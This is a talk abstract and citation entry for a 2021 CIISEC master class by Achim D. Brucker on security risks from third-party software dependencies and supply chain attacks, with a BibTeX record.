Attacking The (Software) Supply Chain: A Piece in Three Acts

By Achim D. Brucker.

Modern systems, ranging from (smart) IoT devices to enterprise software applications, are rarely developed "on the green field": modern developers are "composers" that build systems by combining existing solutions with own developments. It is not uncommon that the final product consists to 90% of third-party components.

One the one hand, these projects speed up the development. On the other hand, their use requires trust and care: with a few lines of code in an installation script, your development system can be powned or a small vulnerability in a dependency can be the root cause of one of the largest data leaks of the last years.

In this presentation, I will discuss, using real world examples, the security threats of using software dependencies carelessly and provide recommendations that help to minimise this risk.

Please cite this work as follows:
A. D. Brucker, “Attacking the (software) supply chain: A piece in three acts,” presented at the CIISEC master class, Online, Feb. 17, 2021.

BibTeX
@Unpublished{ talk:brucker:ciisec-supply-chain:2021,
  author     = {Achim D. Brucker},
  date       = {2021-02-17},
  title      = {Attacking The (Software) Supply Chain: A Piece in Three
                Acts},
  abstract   = {Modern systems, ranging from (smart) IoT devices to
                enterprise software applications, are rarely developed "on the
                green field": modern developers are "composers" that build
                systems by combining existing solutions with own developments.
                It is not uncommon that the final product consists to 90\% of
                third-party components.
                
                One the one hand, these projects speed up the development. On
                the other hand, their use requires trust and care: with a few
                lines of code in an installation script, your development
                system can be powned or a small vulnerability in a dependency
                can be the root cause of one of the largest data leaks of the
                last years.
                
                In this presentation, I will discuss, using real world
                examples, the security threats of using software dependencies
                carelessly and provide recommendations that help to minimise
                this risk.},
  eventtitle = {{CIISEC} Master Class},
  venue      = {Online},
  areas      = {security, software},
}